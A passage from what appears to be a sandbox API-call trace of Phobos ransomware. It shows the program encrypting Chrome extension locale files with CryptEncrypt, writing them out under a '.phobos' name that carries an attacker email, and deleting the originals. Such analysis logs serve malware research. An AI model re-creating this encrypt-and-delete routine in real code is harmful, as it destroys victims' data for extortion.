nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0149.278] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.278] CloseHandle (hObject=0x190) returned 1 [0149.278] CloseHandle (hObject=0x148) returned 1 [0149.278] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json")) returned 1 [0149.279] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.279] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.280] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=216) returned 1 [0149.280] CloseHandle (hObject=0x148) returned 1 [0149.280] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json")) returned 0x2020 [0149.280] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.280] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.280] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.280] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.280] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.280] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.280] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.280] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xd8, lpOverlapped=0x0) returned 1 [0149.281] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0, dwBufLen=0xe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0) returned 1 [0149.281] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe0, lpOverlapped=0x0) returned 1 [0149.282] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32e28) returned 1 [0149.282] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.282] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0149.282] CryptDestroyKey (hKey=0xa32e28) returned 1 [0149.282] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0149.282] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.282] CloseHandle (hObject=0x148) returned 1 [0149.283] CloseHandle (hObject=0x190) returned 1 [0149.283] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json")) returned 1 [0149.284] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.284] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.284] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=216) returned 1 [0149.284] CloseHandle (hObject=0x190) returned 1 [0149.284] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json")) returned 0x2020 [0149.284] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.284] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.284] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.284] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.284] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.285] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.285] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.285] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xd8, lpOverlapped=0x0) returned 1 [0149.286] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0, dwBufLen=0xe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0) returned 1 [0149.286] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe0, lpOverlapped=0x0) returned 1 [0149.287] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32e28) returned 1 [0149.287] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.287] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0149.287] CryptDestroyKey (hKey=0xa32e28) returned 1 [0149.287] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0149.287] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.287] CloseHandle (hObject=0x190) returned 1 [0149.287] CloseHandle (hObject=0x148) returned 1 [0149.287] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json")) returned 1 [0149.288] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.288] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=219) returned 1 [0149.288] CloseHandle (hObject=0x148) returned 1 [0149.288] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json")) returned 0x2020 [0149.288] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.289] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.289] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.289] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.289] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.289] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.289] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xdb, lpOverlapped=0x0) returned 1 [0149.332] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0, dwBufLen=0xe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0) returned 1 [0149.332] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe0, lpOverlapped=0x0) returned 1 [0149.333] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0149.333] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.333] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0149.333] CryptDestroyKey (hKey=0xa327e8) returned 1 [0149.333] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0149.333] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.333] CloseHandle (hObject=0x148) returned 1 [0149.333] CloseHandle (hObject=0x190) returned 1 [0149.333] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json")) returned 1 [0149.334] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.334] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.334] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=228) returned 1 [0149.334] CloseHandle (hObject=0x190) returned 1 [0149.334] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json")) returned 0x2020 [0149.334] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.335] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.335] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.335] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.335] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.335] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.335] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.335] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xe4, lpOverlapped=0x0) returned 1 [0149.336] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0, dwBufLen=0xf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0) returned 1 [0149.336] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf0, lpOverlapped=0x0) returned 1 [0149.337] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0149.337] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.337] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0149.337] CryptDestroyKey (hKey=0xa327e8) returned 1 [0149.337] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0149.337] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.337] CloseHandle (hObject=0x190) returned 1 [0149.344] CloseHandle (hObject=0x148) returned 1 [0149.359] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json")) returned 1 [0149.360] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.360] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.360] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=224) returned 1 [0149.360] CloseHandle (hObject=0x148) returned 1 [0149.361] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json")) returned 0x2020 [0149.361] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.361] CreateFileW 